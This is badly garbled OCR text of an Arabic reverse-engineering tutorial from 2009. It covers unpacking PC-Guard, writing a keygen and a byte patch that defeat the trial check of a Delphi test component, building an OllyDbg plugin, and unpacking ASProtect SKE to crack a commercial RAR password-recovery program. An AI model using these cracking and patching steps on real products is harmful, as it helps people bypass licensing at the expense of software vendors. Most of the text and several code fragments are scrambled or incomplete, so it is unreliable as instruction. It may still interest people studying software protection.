Import G4ya jus o sy pas y as Ey 


ALLI gado ZAS 
Choose your dump file to fix 2x2) 
¡(3 Unpacked a) 00 


(4%) PCGWY32.DLL 


PCOY1N32_Dumped 


jo 


pe — PEDv0.94 


File: eversing|Unpacking PC-GUARD|Unpacked|iPCGWIN32_Dumped_.exe 


Entrypoint:  00025C21 EP Section: > 
File Offset:  00025C21 First Bytes: 55,8B,EC,64 > 
Linker Info: 6,0 Subsystem:  Win32 GUI > 


Microsoft Visual C++ 6,0 


Multi Scan Task Viewer Options Exit 


Y Stay on top >» -> 


al ly 0d ao lll 2009 


lee legs mz loss ago: ATARE Olly 0 do seda plz dice 


o ja al álióc ya E AA 


Pela exception: ¿20239 yo ¿aia ia 


vue ¿hs de Js dl: 
[PE] PEID v0.94 .e 


File: Book_Tuts|Reversing|Unpacking PC-GUARD|Unpacked|PCGW32,DLL 


Entr*point: 00008000 EP Section: > 
File Offset: 00008000 First Bytes: | FC,55,50,E8 > 
Linker Info: 6,0 Subsystem:  Win32 GUI > 


PC-Guard 5.0 -> Blagoje Ceklic 


Multi Scan Task Viewer Options Exit 


Y Stay on top » -> 


Request to load DLL 


File 'ERE_Docs!_ Reversingí_4T4RE_Book_TutsiReversingWnpacking PC-GUARDWnpackediPCGWY432.DLL' is a 
Dynamic Link Library. Windows cant execute DLLs directly. Launch LO4DDLL.EXE? 


A E 
lala Oia ¿Op tas JO ds Loadallexe q) ¿Sd 


olyobg lo aglaya ¿li a Eu 


all ly 00 ¿Ja Iboga 2009 


lora leg as dde IES ago: ATARE 


DWORD PTR SS: [EBP+EBS56E75] 


DWORD PTR SS: [EBP-2F] 


eya lol: 


DWORD PTR SS: [ESP+4] 


InitCommonControls 
GetDesktoplindow 


10 


lí Cn ja y nl sic Sl 0 d a Ea óya ja Ñ 


OllyDump - PCGYY32.dll (2) 


Start Address: Size: Coump >) 
Entry Point: > Modify [1000 |fcetEiPasoeP) (cancel ) 


Base of Code: Base of Data: 


MA Fix Raw Size £ Offset of Dump Image 


Sect..  VirtualSize Virtual Off... Raw sSize Raw Dífset  Charactaris... 
00001740 00001000 00001740 00001000 E0O00020 
00000433 00003000 00000433 00003000 20000040 
DDODO3FA, 00004000 O00003éí4, 00004000 C0000040 
00001930 00005000 00001930 00005000 40000040 
00016000 00007000 00016000 00007000 E0000040 


(3 Rebuild Import 
19) hethod1 : Search JMP[API] | CALL[API] in memory image 
O Method2 : Search DLL 8 API name string in dumped file 


a ay ul dao lll 


las leg as yz Ives oasz: ATARE Olly 0 do ME) J ly a PLE lodo z 


áttach to an Active Process 


Pick DLL 


se 


204 qa ze Process E duo? JO sé Loaddll.exe ¿Qe 


O 5 "> 
AN de 
¿Pick DLLZ> YI go 


y gsapos asi Dll zo : 


gdl bey rg gas ¿o Imports Qu CE lg Noya a: 


SELECT 4, MODULE (2) 
Image Base Image Size Name a 
0001D000 pcgw32. dil 
58850000 00097000 comctl32. dll 
58090000 00038000 uxtheme. dll 
62DC0000 00009000 Ipk.dil 
74630000 00048000 masctf. dl 
75300000 D0006B000 usp10.dill a 
77390000 00102000 comctl32. dll v 


EU ua pia ala Y ,¿AutoSearch egbo E Loya Sad Quo 


Found something! (2) 


Found address which may be in the Original 147. Try 'Get Import". 
(Ifitis not correct, try RA: 00003000 Size:00000433) 


a 


> |84T Infos Needed-———— 


RAYA, [00003000 
Size (Get Imports ) 


ear ¿Imports Get JJJV 351J 016-9008 0á0 : 


all ly 0 zado lll 2009 


led les diz IES UAG: ATARE Olly Avd JPL lan dcIoEdusse 


Imported Functions Found 
comctl32. dll FThunk:D00003000 NbFunc:1 [decimal:1] valid: YES 
adi32.dll FThunk:00003008 NbFunc:3 (decimal: 3] valid: YES 
kemel32. dll FThunk:00003018 NbFunc:3 (decimal: 3] valid: YES 
shell32. dll FThunk:00003028 NbFunc:1 (decimal: 1] valid: YES 
user32.dll FThunk:00003030 NbFunc:15 (decimal:21] valid:YES 


A A A A 


A. e ES sofespoa 
Td kiyoh 5 90 ¿00 caja id cue 
Choose your dump file to fix (9) 8) 


(ES Original E, € 1% ps E, 


Nom du fichier: ——— [PCGw32_Dumped |] Eon) 
Fichiers de type : |PE files (exe, * dll) 8) £ Amnuler 


7 Ounrir en lecture seule 


Aa 


Aki dóy e 3d, po ¿da 


Ca ya 
MEAN A EA 


ela ¿uy zo 


all ly 00 ¿Ja llo pat 2009 


las leg as yz Ives oasz: ATARE Olly gio sd | yo LE lacados? 


all lo al, ci) ga eun, 


Delphi component RCE 


¿uo e qa pop od ads 2 qlabcs Keygening and Fishing Seria 


¿pta ai ja ¿Patching 


E A EN 
y As 


Aya road jo yaa ya galo jon, 


| TES A ON de 
Gal q Ja ga ra a ja 
Pas 231 ¡ye ¿pS ue Procedures y Functions » 


Deu ze ayas O 


Bolo yuairivaóa o a ya 


ES 


Abeja y ajja glo slo ¿uo dde oa glo 


ye abeg0d 4 ¿ye Egplo e OE des: 


all ly 00 ¿Ja Iboga 2009 


al leas amd lveSgasz: ATARE Olly UT lola EST EA 


¿OlyDbg «Iéulas O) y 
la O 


.HexWorkshopv5 “¿: 
Searchandreplace-Strings==7 0 Sao Es 403 o) 


.Delphi 7 Entreprise O 


e A E E 
EN yabgdo a da $] pija ¿ galos 99 lado ¿o jiiliya cab Ue galo 
wo, n ; sli X ¿e : co E: a es E a al A 
S gay Zoco ctra í ¿áyabó y JU 3 bo a otadaliy) ja y) 
galo, 
iy  «Obfuscationo2**gó2  Junkcode sg)  Bagisjrgó iba EN 
33 


SÓ Je LS OISTRIALTEST 
A AA TA 


ATARE 391/36 ISTRIALTEST+94b00 y, 


EN E e 


all ly 00 ¿Ja llo pat 2009 


las leg as yz Ives gasz: ATARE 


ES EA 


ATAR! 


ps 
Do oa ra] 


156-898 
Vue arborescente des objets 
éa 
E] Form 
[5] Button 
al Edit 
al Edit2 


e) IsTRIALTEST1 
E] Label 


Inspecteur d'objets 
IsTRIALTEST1 


Propriétés Evénements 


Name IsTRIALTEST1 
RegCode Unregistered 
RegName Unregistered 
Ta 0 


A INS 


EL Edition Chercher Voir Projet Exécuter Composant Base de données Outils ModelMaker Fenétre  Lide <Aucun] 


RX Controls. Samoles RX Tools RXDBAware mirkes.de JvNon-Visual JvWisual JvPersistence JvApolication. Forms 44 


Author STRELITZIA | ATARE 


Delphi 7 - Project1 


Bj»- ¿e ¡OA AO 


My program caption ¡SASME) 


ATARE ÓSEO 01 
ISTRIALTEST GúLi garra 02 


¿btrsyaibyje ji Jo 03 


LóSya pagó: q dedo 0O al 490 30-20 35 A go Pa 
Guia: 
My program caption (2) (2) (2) 
Edit 
Edit2 
Ok 


AV cs 


as 


big g omo les URGE: ATARE Olly 0d luca Leido 


Project! (8) 


You use TRIAL VERSION 
Try to Reverse me l'm very easy CL Component 


Arab Team 4 Reverse Engineering 
STRELITZIA | AT4RE 
www atáre.com 


[fOS d y A ON 0 ] ROA cor Maa - 
Caption 2 LY+% Trial Version he Eo Fo jámya NN uy das e dl jo dote GO pa 
Su 
D My program caption - [TRIAL WERSION] OOO 


¿rab Team Reverse Ergireanra 


do 2 . Are L .2 e S a E As Es sn 
del taco Version ¡aye iolljalo yl tao lUY 39 zii do 


Trial : 


E 


Project 12) 


You use TRIAL VERSION 
Try to Reverse me l'm very easy “CL Component 


Arab Team 4 Reverse Engineering 
STRELITZIA | AT4RE 
weon atáre.com 


0) 


ade jalo va ¿papa la ada q tá ayb 


Gra Baja VERSONTRIAL Sao fed. 01 
¿O Aja ps ¿ya ds 

350 par all ys altas joya ón 
dóxua ¿dra Nagscreen 34 És CARÓ. 04 


9% ho e Ma ; 
Soya qóiyaNagscreen ésos. 05 


aby Uca ll pal 2009 89 


ld loe as iaa Ives agz: ATARE Olly go sd ly a plz loe 


4 ju aia jalapa A Fl pa a bd ON DO 
Windows API yes yaroogós ¿os 3 Textstringsreferenced Trial 
A 1 Ta Já E y Z Strings sin ja aborto nu dijo Li UE ¿bid dz 3) JijS LEA», 


z 


SA o 


y $ bo 
Reverse bis Es Co 2Ú pisaja do e ¿o EN ya Masa jija 34 


engineer ¿0 ¿quaSo yo ya jo ¿ala ¿Had Obfuscation ¿pré $¿y20 a, 


mad 3301 0522 0 VERSION TRIAL ¿2% 3 ly 09 és 


EEES 


OnCreate ¿ozu cho: e re 


DWORD PTR SS: [EBP-4] 


DWORD PTR SS: [EBP-4] 


DWORD PTR SS: [EBP-4] 


SNC 


all ly Uca lll 2009 


las leg as yz Ives oasz: ATARE 


Olly uds divo aba 


EST EA 


ut alo Uacalls - ¿bl y yayo E, Seva as ¿bebió cea a 


sal Uéz 
004541AB PUSH EBP y Pue 
y Puabsá 
004541D0 CALL 00453D44 
A 
00454107 INZ 00454228 "¿gra rasgos 
004541DE CALL 004273B0 


004541F3 CALL 00404150 


Gs Caption Trial Version 


Eóróns sa a c ato 35 


vai óbe gala ed 


o 
sá 01 
02 

03 
04 
05 
06 
07 


ea q ñ dl PS ea 3 
A 


(Project1_ 00454118: 
push ebp 


mov ebp, esp 

adas so 

push ebx 

xor edx,edx 

mov dword ptr ss: [ebp-8],edx 
mov ebx,eax 

xXOr eax,eax 

push ebp 

push Projjectl 0045419e 

push dword ptr fs: leax] 

mov dword ptr fs: [eax],esp 
xor eax,eax 

mov dword ptr ss: [ebp-4],eax 
mov eax,dword ptr ds: [ebx+5038] 
call f(Project1 00404148 
testeo 

31 (Project1_00454157 

inc eax 


aby ly 0 U calado lll 2009 


Z due 3 glas 


las leg as dz Ives sz: ATARE 


xor edx,edx 


GProject1_00454148: 


E] 


mov ecx,dword ptr ds: [ebx+5038] 
mMOVZX €Cx,Dbyte ptr ds: [ecx+edx- 


add 
ine 
dec 
jnz 


dword ptr ss: [ebp-4],ecx 
edx 

eax 

(Project1_ 00454148 


(Project1_00454157: 


mov eax,dword ptr ss: [ebp-4] 
mov ecx,$0256 

cda 

idiv ecx 

imul eax,edx,$01024 

lea ecx,dword ptr ss: [ebp-8] 
mov edx,$010 

call fProject1_00407E38 


mov edx,dword ptr ss: [ebp-8] 
mov eax,dword ptr ds: [ebx+$03c] 


laca 


¿era ja dz ábop tó ¡taa Jose ja 
Ja Ajo zuleta o la, 


Agar Ub yaya. 


34 Ge di alt ¿dijo 


¿lugo ASI 


vel Sol Eo tagh: 


User name = STRELiTZIA 
53+54+52+45+4C+69+54+5A+49+41 32B 
32B mod 256 = D5 
D5 * 1024 = D6DF4 
Format 16 hex = 00000000000D6DF4 
function GetValidSerial (Name: string): string; 
var i, Serial: integer; 
begin 
Serial := 0; 
for i := 0 to Length (Name) do 
begin 
Serial := Serial + Ord(Name[i]); 
end; 
Serial := Serial mod ; 
Serial := Serial * z 
Result := IntToHex (Serial, 16); 
end; 
procedure TKeygen.GenerateBtnClick (Sender: TObject); 
begin 
SerialEdt.Text := GetValidSerial (NameEdt . Text); 
end; 


de bl, 


od z 9d ado llar 


las leg as yz Ives oasz: ATARE WwelelVrs e 
O Ea A al , de a Af 
CAST SO ET abogal 


II A A EN EN 


A ( N 
AO Q 
s y 


GProject1 00454lac: 

push ebp 

mov ebp,esp 

push 0 

push ebx 

push esi 

mov ebx,eax 

xXoOr eax,eax 

push ebp 

push Projectl_0045424b 
push dword ptr fs: l[eax] 


mov dword ptr fs: l[eax],esp 


mov eax,ebx 


¿iia Já ilyjo ds á 


call (Project1_ 00454118  ————————_— 


test al,al 


al =1 ding 


jnz (Project1_00454235 + — 


mov eax,ebx 


call f(Project1 00453D44 


test al,al 
jnz (Projectl 00454235 


E _AA<AAA>—22OKÁ 


Sus ¿o ss 


 —————— IA al =1 Gia járilya 


mov eax,Project1_00454260 


GProjectl1 004273B0 


lea edx,dword ptr ss: [ebp-4] 
mov esi,dword ptr ds: [ebx+5040] 


gb y pedis ae Milly ¿lo a 0 grua dopo 


call fProject1 00454118 
test al,al = 

jmp GProject1 00454235 
mov eax,ebx A 

call (Project1 00453D44 
test al,al E 

jnz (Projectl_ 00454235 


a ay ol dao lll 


" 
' 


Caos 


sl 


— JW? ¿uéb) NZ 


Jal a BE stat 


las leg as ado Ives gasz: ATARE Olly 0 do ME) J lu: plz lodo z 


v5 HexWorkshop 


MigupS siria mita 


*eTrial ea iyaba jaibityes package Delphi Gs ie ó 


3 ¿etasalUs ireplaceandSearch hug! 


Search for: TRIAL VERSION 


E3 
6 


TD 
D 
2 
7 
o 
ú 
Z. 
ES 
> 
A 


_ 5d 
File Mask: |” 18 
Path: | CADocuments and Settings +UtilisateuriBureauWsTRI4LTEST 14) 8 
Search Results: 
Processing file : C:¡Documents and Settings UtilisateurBureautlsTRIALTESTMSTRIALTEST.dcu 
Difset 0x1362 - You use TRIAL WERSION 
Offset Ox13ee - - [TRIAL VERSION] 
Difset 0x1436  - You use TRIAL WERSION 
Found 3 occurrences. 
Processing file : C:¡Documents and Settings UtilisateurBureautIlsTRIALTESTMSTRIALTEST_ Install bpl 
Offset 0x1948  - You use TRIAL WERSION 
Offset 0x19d4 - - [TRIAL VERSION] 
Offset Oxlalc - You use TRIAL WERSION 
Found 3 occurrences. 
Searched 3 files), found 6 occurrences in 2 file(s] 
E bo : ; e NO A CO A e dd Ñ 
q ió 0 ly aba Trial Version A 
si su 
00454105 E8 4EFFFFFF CALL Project1.00454118 dedo ¿vedad 
004541CA 84C0 TEST AL,AL 
004541CC 75 67 JNZ SHORT Project1.00454235 84C075678BC3 
004541CE  8BC3 MOV EAX, EBX nl a 
004541D0 E8 GFFBFFFF CALL Project1.00453D44 boi 
004541D5  84C0 TEST AL,AL Hex 


all ly ud ao lll 2009 


lid log aa loe ago: ATARE Olly uds dl JE illa e 


Find (2) 
Criteria 


Find W'hat: 
Type: EENES 


Walue: 84C075678BC3 > 


Text: ..ua.. 


Options Direction 
Y Find All Instances Up 
* Down 


688D 0000 008D 45F8 E800 0000 00C3|....3.3.ZYYd..h..... AA 
558B EC6A 0053 568B DB33 CO05S5 6B9F|......... [YY].U..j.SV..3.Uh. 
0000 84C0 7567 8BC3 E800 0000 0084|...d.0d. ......... E 
S5FC 8B73 408B C6E8 0000 0000 8D4S|.UN........... U..sB........ E 
8BC6 ES00 0000 0033 D28B 4340 E800|..D......... A 3.00, 
E800 0000 0033 D28B 4340 E800 0000|....CO0.Oh.......... ce A 
5959 6489 1068 A600 0000 8D45 FCE8|....CO..... 3.ZYYd..h..... e 
595D (300 FFFF FFFF 8500 0000 S96F|............ le A Yo 
5253 494F 4E0D 5472 7920 746F 2052|u use TRIAL VERSION.Try to R 
7665 7279 2065 6173 7920 5643 4C20|everse me I'm very easy VCL 
6220 5465 616D 2034 2052 6576 6572|Component..Arab Team 4 Rever 
0D53 5452 4540 6954 5449 4120 7C20|se Engineering.STRELiTZIA | 
652E 636F 6D00 0000 FFFF FFFF 1200|AT4RE.www.at4re.com......... 
5253 494F 4E5D 0000 538B D88B C3E8|.. - [TRIAL VERSION]..S..... 


a 1 instances of '54C075678BC3' found in IsTRIALTEST .dcu 


- Address Length 
ñ 00001204 00000006 


IsTRIALTEST.dcu Lá> S6ó%L 


000012B4|0000 0064 FF30 6489 208B C3E8 0000 0000 8400 7567 8BC3 E ¿ys 


000012B4|0000 0064 FF30 6489 208B C3E8 0000 0000 84co BEs7 seca E 3 


ISTRIALTEST_Install.bpl l£> 6ó*L 


00001890 |0064 FF30 6489 208B C3E8 4EFF FFFF 84C0 |BE67 8Bc3 Es dl 


all ly 0 ao lll 2009 


lag log 0 om lors ago: ATARE Olly 9udbdsdivc aba lsodocIuEdurt 


0000189C|0064 FF30 6489 208B C3E8 4EFF FFFF 84C0 [BB67 8BC3 Est ;»-. 


añ glo cr Ag kh tó go jo lado a 3 


[03 Alle OL, ajaja cesión 


.compilation  “bljapÚ ¿Oli 9000 


all ly Uca lll 2009 


la leas amd lveSgasz: ATARE Olly ET losa ESTE 


Oy Did 


Developpins an O0lbDbs Plugin 


-OllyDbg o) 3 

-Plugin Development Kit 1.10 () 

CLÍO C/C++ IDE GON | A c/c++ compiler/linker o) 
.)vs2008 


eN 
Ca ad 


Sl guegs 146 dat pa y 1gó »alyaDll  =XL OllyDbg yaa 


vel . plugin.h 


152 ud 3 OllyDhg mz 35d ds? Jet ya aja Cea lr de "DLL" ly ió alg yoo 


_ODBG_Plugindata 
ODBG Plugininit 


all aji ya yaya, 


ad? yal "DLL dodo das ¿ode sv OllyDbg—zu% 


A $ ne 5 a A 3 E d $ ns 
4 39 ón qa aya JN Ugo da OIyDbge FÓgE ja: 


."Dynamiclinklibrary" /.s 342: 2/ero.1 


3 ODBG_Plugininit_ ODBG_Plugindata_ 2% +30 .2 


a ly 00 ¿Ja llo pat 2009 


ld los iaa Ives oagz: ATARE Olly gio sd | Yo JE lacado. z 


"Dynamiclink library” z : 2 AGA Lisó £106) 


os ¿in eds. 


.New>>Project gs Filegepaids 
Visual C++ >> Win32 SE lb ls vaa da 
Sl Afiraya ábjága ¿40 Project Win22 316537 
add JJÓg"<Enter_name>" ¿ucós "MyOlly" ab 2 Yeso 


00000 


cual 
asa) abóx y, 3Project"""Emptyz / ales iv ae "DLL" £ Ed Ed 


ayb Fuel e Ego DU aób jeiós: O 


BOOL APIENTRY DllMain( HINSTANCE hModule, DWORD ul reason for call, LPVOID 

lpReserved) ( 
switch(ul reason for call) ( 

case DLL PROCESS ATTACH: 
g_hInst=hModule; 


h 
return TRUE; 


04 CEN yan yo ¿by point" "Entry 32 Es Dejar? Wal 2ya "DLL" 
das E tOlaal 3922 "g_hinst"aalV ¿0900 HINSTACEAhaya Jay ra 


CU CA AT 


Alien ODBG Plugininit + ODBG_Plugindata_ “Eu! ¿4ó) 3 


reed a e s1a 5d | AS 


ODBG Plugindata «úd li 24 prón «OllyDb aldea dt) js ya Si O 


g 3 
.ODBG_Plugininit 


¿o At quelly: 


int ODBG Plugindata (char *shortname) ; 


all ly 00 ¿Ja Iboga 2009 


las leg as az Ives sz: ATARE Olly 0 do mE) J ly plz RA TIA 


alJujye al 9 shortname y 3 Ale A Los $30 «OllyDbg Y Uy EA nu S 2) io 00 
Ya 30 
Bh ¿Oe es O dy dal ds e a e Rs OllyDbg sue de 9% 
ya + ya 


6,0 


.PLUGIN_VERSION 


¿aldea rd sde ie 


Cda ua 


int ODBG_Plugindata(char *shortname) ( 
1lstrcpy(shortname, "MyOlly"); 
return PLUGIN VERSION; 


A 
a 


dan jes ¿da Istrcpy uo 2 ay ya eS pt PRA 3 ¿bxl, shortname «Gi SÍ 


ito PLUGIN_VERSION ¿69450110 2 00 OllyDbg ¿es 1ezis all aya 


y dro ración aye .ODBG_Plugininit 


Pohroñagalibos ia: 
A rr 


intODBG_Plugininit ( 

int OllyDbgversion, OllyDbg ¿ón zgé 
HWND hw, Aia ¿pz coo Ol Dig 
ulong *features ¿ope a ¿agua 4 OllyDbg jonas años, 

le 
OllyDbg Jeaki ¿raya jáaó 391 GE SS BIO 
Return value ” a 
OllyDbg je325 ¿Ur aya, 


abi ly 0 U cada do lla! 2009 


lio lug 1 om lu LA: ATARE Olly usd da eldoge 


int ODBG Plugininit (int OllyDbgversion,HWND hw,ulong *features) ( 
if (OllyDbgversion<PLUGIN VERSION) ( 
return -1; 


) 


g_holly=hw; 
return 0; 


) 
OllyDbgversion eli o aga AGO PLUGIN_VERSION djizz gasió ¿gd ly mor 
110 ES 


BR id? a 1-  PLUGIN_VERSION 4215 OllyDbgversion vepóg 53 ¿ón a de OllyDbg 


aó ¿uya 


€ PLUGIN_VERSION4> | 50llyDbgversion yepO Ed Ub jaits 


soL 10 5% Aero pt Aga % gal: IYAL), 


Losas 03d cómo Fue due 
7 aldo ¿dove ODBG_Plugininit 4 «6 ¿my 34 ao! 
.OllyDbgversion<PLUGIN_VERSION 


da 390 JO Ur ya aso sue OllyDbg 1.10 £313 ¿Cave PLUGIN_VERSION £0251100 ¿Co 
aydegapbálr jasa pue dues OllyDbg 22 dei ¿aya OllyDhgversion bo23 a 


dog uye ia Udala 240 Eo 1203 108 


oka la: 7d OOO 0 ¿amalas y yaris ars gls niña! 


ES 
. OllyDbg 


boo da 
QUO yy 200 a 


g_holly=hw 


QuE god EL se 
Faz API 


EN sd celo Ed Uy | hOlly" + uá y ¿sv q 0 10 OllyDbg 5 O el dE 1YJtné la 


al ly Uca Ult 2009 


gala 0 omo lueSLAgz: ATARE Olly 90d d iv aba leciugloedunge 


3 > 


1? 


Graga ag00 yy disp OD EG jes ya ll ai 


¿dis dista OllyDbg lama qbo jas 3h lA re 
: "plugin.hlp" 


e 


DEIS 


ODBG_Pluginmenu 30 ¿hue ¿bal a a Lóos, lo) 
ODBG_Pluginaction ¿¿4:30£> 


Es OllyDbg BS 5 vo ib Ja, o 


Cate co 


ay: 


intODBG_Pluginmenu ( 


| intorigin, EE AN 


chardata[4096], 


má tdo abasia 34g + .OllyDbg 
void *item o ea o 
vi PE 3 3Ajya of 


OllyDbg +63 30 5* Gátyal GO gra 


A 


He Lo bol: 


int ODBG_Pluginmenu(int origin,char data[4096], void *item) ( 
switch (origin) ( 
case PM_DISASM: 


1 
char items[1024] = 4 'X0' ); 
wsprintf (items,"0 Follow selection"); 
l1lstrcpy (data, items); 
return 1; 
) 


default: break; 
) 


return 0; 


all ly 0 Jas lll 2009 


las leg as dz Ives gasz: ATARE Olly 0 d mo) J ly plz lodo z 


del CI ésa Ñ 
UA 


6 gy yal e switch ¿ll origin o deso ¿zm >2OIIyDbghscála O 
¿aba yasoPM_DISASM ¿pudo seg O 


9% OllyDbg ¿25 *B bt óayaalljido, aaa 
asco lle ¿eayaorigin0s ¿.PM_DISASM 
Ji ¿isa jo ábyja de dceg 30 eueo ¿dd Agudo oc 3x5 1024 iu uy S Po da 
dd ae 
plasd 3 OllyDbgo + Óy  dóal < Istrepy varias dia rusia y dl Al ada go 
INGA 
¿isya pegó, 3 Bb jo dla ja llo, 


lat raso jálos ¿0 jas quo 


xOllyDbg 31:1/ data CAL 9 "Follow selection O" s£s 3) 1ú $oGé aia 


235340 je selection" "Follow 5*9 3% ato ¿eec.0 


PEE 
¿q ióiseja ile ) lll zos dz Ji (20d) 
( 
¿lisicalo O 
NO) 


Ñ al So en e a 3 
37 30 al, ¿iy l 0%) 


A . me pa 
4 cactus, 


+25 Ll plugin.hlp 


AS nado E 
Sy ea ón: 


void ODBG_Pluginaction ( 


int origin, O aa 3 jasiajo ¿aja 2 a BS pao, 


int action, el A A E A 


all ly 0 ao lll 2009 


lg leg 0 omo luego: ATARE Olly 9035 d Ivo aba leciugloedunge 


| void *item más do abajo Y 9 .OllyDbg 


void ODBG Pluginaction(int origin,int action,void *item) ( 
if(origin==PM DISASM) ( 
switch (action) ( 
Case 0: 
1 
t_dump *pd= (t_dump *)item; 
if (pd!=NULL £8 pd->size!=0) ( 
Setcpu(0,0,pd- 
>sel0,0, CPU_DUMPHIST|CPU_DUMPEFIRST| CPU_DUMPFOCUS) ; 
) 
) 
break; 
default: break; 


Loss 
a: 


Elotaj ¿mija Soja dy da y coc hh PM_DISASM 3acida origin vepód bi 2 jajeas de O 
ay ds 0 ¿gaeactionz».0 
tol god q0e ¿alla jeta o selection" "Follow ¿poló ¿eg *lO* o 


.e.3 


0 hd pela jad e 


genuasetepu 30 ias juitua a ias 6C 20 llyDbg Brady, 


El 


Edge pz zed sd 3 sz OllyDbg ¿as Sos .Cpu,dump,stack 
+2, Li lolugin.hlp Lo 


E 
Aló 


vd ga A Jévealy ya ton ab y ¿ya 


3jA0aU) + OllyDbg : dig? jtad do je Ji jo sli ¿980 joe 


cdecl : Ls ¿ip $ A u y bosja y cdo pa 
Etnia: 


void export cdecl ODBG _Pluginaction(int origin,int action,void *item) 


3635092 2020DBG_Pluginaction iissogón jor 


Jas 


void ODBG _Pluginaction(int origin,int action,void *item) 


all ly 0d zado lll 2009 


Lage 0 omo luego: ATARE Olly 9035 divo aba leeciugloedunge 


/So3La $ OLLYDBG.LIB > plugin. h ¿GL3 yaa ,2 


eg cóo balsas ds : (Ea FLO aaa geshaboo yl Drop" and A Da rg 10) 
¿pro FE 
Option > Configuration Properties > “atáyaimija: — ¿ión cpu, ja d0z opor 


C/C++ > Language > Defualt Char Unsigned > Yes 


Ju dodo goal ode ue 30 gd a OllyDbg 


bos a dio disirro pio Alojya  plugin.hlp sl s0E% das ¿hy As S) 90 205 
á 


1) 


all ly Uca lll 2009 


lag lus aaa Ives ago: ATARE Mis id a UT ele. 


Aa 3 O ASPROTECTSHE ISR 
ASPROTECT SKE UNPACKINGC/CRACKING 
(several methods ware used) 


ASPROTECT SHE 


FOR WINDOWS 395/398/ME/NMT4/2000/XP/20039/VISTA 


.AtomicRAR Password Recoveryv1.20 : yes? ¿20 yá ¿a 
NE: E00 Jaja aya rar Fada Jisaya 70, | 


.ASProtect2.1xSKE->Alexey Solodovnikov : 


Escoja 2, VÍ E 93 http: //www.apasscracker.com: 6% yes RE ea 


ESgcaya pa do yo zado eo 


Ni zo Cali 


.OllyDbg v1.10 O 

.HideOD+OdbgScript v1.65 € 

)uaiódá Ci .Aspr2.XX_unpacker_v1.14aE.osc € 
. PEIDVO.95 () A 


.Import REConstructor F v1.6 0) 


.aspr crec locator lO) 
. DUP v2.19 lO) 


N 


«Stripper v2.13 beta9 or above o) 
.ASProtect SKE o) 
.Inline Patchinger v0.2 lo) 


E 


JA yu Joa 


8 ay ol zado lll 


lag logs aaa Ives ago: ATARE Mis id m UT elvas t 


Lrar 2.rar 3.rar 


lug 13 SUS aglaya rar as jo Jaja 0 


Cialis 
(tes> ]) Cancel 


gcóbs rarlás Ce 2 ¿Open RAR File Z > 60 du 


a Nextz» Cs AtomicRarPasswordRecovery.exe 


:Addtoproject 2» 0015ó Cass: 


Us ábtomic RAR Password Recovery 


A (RAR 2.90, 


Encrypted file Packed size  Unpacked size Comments 
1. txt 32 7 The most pref 


Add to project 


RAR archive Encrypted file Type 
1.rar Packed 


ai ls Uca lps 2009 07) 


lg logs a loe ago: ATARE Mis ¡de UT E LA 


eoliano jló ¿ojE 
Information 


A Sorry, this file can't be cracked with already placed ones simultaneously 


[ox ] 


PALAS il ñ á ro , EN ext ET Ed dor dia 1 JS EAS El q 20 K: 


Information 


You have selected RAR 2.90/3.xx file(s). I just want to notice that the cracking process may take a very long time 
and doesn't guarantee a success! 


[ox ] 


Eee 0 ÉNEXT: 


“4 Atomic RAR Password Recovery 


Choose password recovery method: 
O Bruteforce attack 


(9) Dictionary attack [dictionaries required) 


<Back  [ Nex> |] Cancel 


A to 
¿said iya 
aa 


Fa jurada 9913 9 uatxtag 1 sa 39 3000 E Next 


A To use more than 2 dictionary files you must register the software 


[x_] 


all ly 0d ao lll 2009 


las leg as dz Ives sz: ATARE Mis 1 7 UT RO TIA 


oacuatxt e SEN extabz Vigil 


la Y ld q EN ext: ) ; e 2 


*%4 Atomic RAR Password Recovery 


Startup 


License Free evaluation version 


Project C-AProgram Files átomic RAR Password Recoverylsss88s.1pc 
Archive stripper_v213b39.rar (Password: still not found) 


Current word on new softuare releases from our com... 
Words left 94 

Performance rate 47 (4 p?s] 

Time left Oh:00m:253 


E DA na A O E Aaa o da » 
degóabódjasitn UT TT + ES Eden yd 


:PEIDVO.95 ¿ig dns ed Je 


Linker Info: (7,10 Subsystem: |Win32 GUI > 


ASProtect 2. 1x SKE -> Alexey Solodovnikov 
Multi Scan Task Viewer Options About Exit 


— 


3SKE2.1xASProtect 


)1 Saa Jedi betav2.13 Stripper: 307 Ju ab 32. 1x ASProtect 


SKEs tad PoR 


Y 2 L El Qi lega por eg das 7 


$ 
"álas ESb ASProtect ib io  ¿E0 9  ONIyDbg 


ya 


cógava áldss 3y ce: OdbgScriptv1.653%053 o ¿seo 


o. ya 


e di Uat ó) As Aspr2.XX_unpacker_v1.14aE.osc 


Ho 


2 


A UTE 
E 


3 4 G Loader: ¿004 Ce 1350 ue check CRC 5) 


«su co Advanced Loader Generatorisí ¿ayas dy gigas a za Loaders Ep» 


.asprotect-=>Loaderdp* Gb ó5goARTeam jó6 


da 


s 


0 CARO. 


all ly 0 zado lll 2009 


ld logs amo loe agz: ATARE Mis ¡de UT dice. 
: 008 ¿yal e Pa pe aa eg ye) puede Inline Patching Ey» )4 
¿liga 3 
.ASProtectSKE Inline v0.2 Áz 


bey Li q a gs q hi body JN ES de method Os. En Edo se NES 


MUP sE E E IAIOEP Dumps 
q8 
lar ete 


Y 


A E E O TO 
A OA 
¿bid Jill ja quae Ga dee cu : " 3 el vd q a 


Openzr 00 CuStripperv2.13beta9isqoó de? 


AtomicRarPasswordRecovery 994) E ¿2 y jas Ls dd 


save 


¿Save d a Ud ARA aos Imports coc Qu Pu 


. _AtomicRarPasswordRecovery.exe E) CAI có Oy cy ula Lada GE 


007 “O Stripper Qi ás jajaaj, € 


<duframór 3 FixingDumpFile  fixingimports  dumpvictim  «“die jósLos Ep 


Ca Ue Ue 


a ¿a Íh A TE 
JS q a ga 7 


caia OllyDbg ¿Pie a as 


Ed 


Plugins >>>OdbgScript +» 2: 
E) 


Aspr2.XX_unpacker_v1.14aE.osc 


0n4B101A » Sa. 
00401518 7d E History. txt 
BR4B1B1C ula A EA 4 a 
6u4B1561D0 . — = = 
0040101E Local Disk (D:) 
004D101F [Ed] Aspr2.xx_unpacker_v1. 14aE.osc 
00401020 Ñ PR TUTS 
Y Astripper v213b9 


all ly 0 zado lll 2009 


lira logs ai loe ago: ATARE Mis ¡de NT AL 


MSG ODbgScript 


uN ) There are stolen code, check IAT data in log window 


[o] cancel 


ae, QU 2e ya do Ce y ¿ye y e ua ¿ouaaiho TOPTO ya El 3 d d de ¡CAN 


den EOKabE y Íy ZAlteL : 


a data 


>| Breakpoint at AtomicRa. 004606415 
GetHardwarelD 06414290 
Q/|Breakpoint at AtomicRa. be de 
